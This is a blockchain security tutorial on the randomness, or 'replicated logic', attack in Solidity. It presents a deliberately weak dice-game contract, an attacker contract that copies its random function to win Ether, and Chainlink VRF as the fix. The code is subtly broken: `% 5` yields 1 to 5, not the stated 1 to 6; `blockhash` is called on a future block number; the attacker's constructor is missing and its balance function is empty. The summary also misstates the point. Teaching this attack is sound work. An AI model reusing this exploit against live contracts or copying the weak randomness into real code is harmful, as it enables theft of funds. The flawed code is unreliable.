# Smart Contract Randomness or ReplicatedLogic Attack

This is part 7 and a continuation of the Smart Contract Security Series.

In this tutorial, the randomness attack or also called replicated logic attack is analyzed.

The problem in Solidity contracts is finding the true source of randomness.

We will see how generating a random number using on chain data cannot be trusted.

The tutorial starts with exploiting the randomness vulnerability, followed by the possible solutions. Let us begin the exploration!

## Exploit

To explain this exploit, you can consider any game where the user is asked to guess a random number such as a dice number, a card from a pack of cards, or an online lottery contract.

To keep it simple consider a contract game for guessing a dice.

The user is asked to guess a dice number between 1 to 6, and if it matches the random number generated in the contract, then the user is awarded a prize of 1 Ether.

The contract code for `DiceGame.sol`.

```contract DiceGame
{
constructor() payable{ }

function guess_the_dice(uint8 _guessDice) public     {
uint8 dice =  random();
if (dice == _guessDice)           {
(bool sent, ) = msg.sender.call{value: 1 ether}("");
require(sent , "failed to transfer");
}
}
// source of randomness (1-6)
function random() private view returns (uint8)     {
uint256 blockValue = uint256(blockhash(block.number-1 +    block.timestamp));
return uint8(blockValue % 5) + 1;
}
}```

The contract logic is briefly explained.

1. `constructor()` made payable to put some initial reward amount to the winner of the game.
2. `guess_the_dice()` takes a param from the user (player), generates the random number, compares it with the user input number. If both are equal then the user (player) is rewarded with 1 Ether.
3. The `random()` function uses the previous block number and the current block timestamp to get a random number. The previous block number (`block.number-1`) is used here because the `blockhash()` does not allow you to calculate it using the current block number as the current block is still under process w.r.t current transaction. Before the random value is returned we mod it by 5 and add 1 to keep the dice number between 1 to 6.

The `attack.sol` contract.

```contract Attack{
DiceGame dicegame;

{
}

function attack() public{
uint8 guess= random();
dicegame.guess_the_dice(guess);
}

// source of randomness (1-6) copied from the DiceGame contract
function random() private view returns (uint8) {
uint256 blockValue = uint256(blockhash(block.number-1 +    block.timestamp));
return uint8(blockValue % 5) + 1;
}

// gets called to rx ether

function get_balance() public view returns(uint256) {

}

}```

The attack contract logic in detail.

1. The constructor accepts the address of the deployed `DiceGame` contract so that it can interact with this contract.
2. The `attack()` function uses or replicates the exact random function used by the `DiceGame` contract as the source code of the `DiceGame` contract is available as open-source or on etherscan (as part of contract section or verified contracts). After getting the random number it calls `guess_the_dice()`
3. `get_balance()` gives the balance of the attacker contract.

Copy the contracts in Remix and execute them.

## How the Exploit Occurred

As you can see, every time the attacker calls the `attack()` function, he/she is able to match it exactly with the number in the `guess_the_dice()` function of the `DiceGame` contract.

As the `random()` function was replicated from the `DiceGame` contract, it will generate the same random number in `attack()` and `guess_the_dice()` as both functions will be part of the same transaction, in other words, the same block.

## How to Prevent the Attack

• The attack can be prevented if any on-chain data such as `blockhash`, `block.number`, `block.timestamp` is not used as the source of randomness in the contracts.
• Use ChainlinkVRF as the source of true randomness in contracts.

## Summary

In this tutorial, we saw how assuming that the on-chain data related to blockchain such as `block.timestamp` or `block.number` can give us true randomness that cannot be duplicated or exploited.

While it is true that in computer science it is hard to generate a true random number with the help of an algorithm, some functions are better than the others and chainlink VRF is one such function that helps in generating a provably fair and verifiable random number.

## Programmer Humor

``````Q: How do you tell an introverted computer scientist from an extroverted computer scientist?

A: An extroverted computer scientist looks at your shoes when he talks to you.``````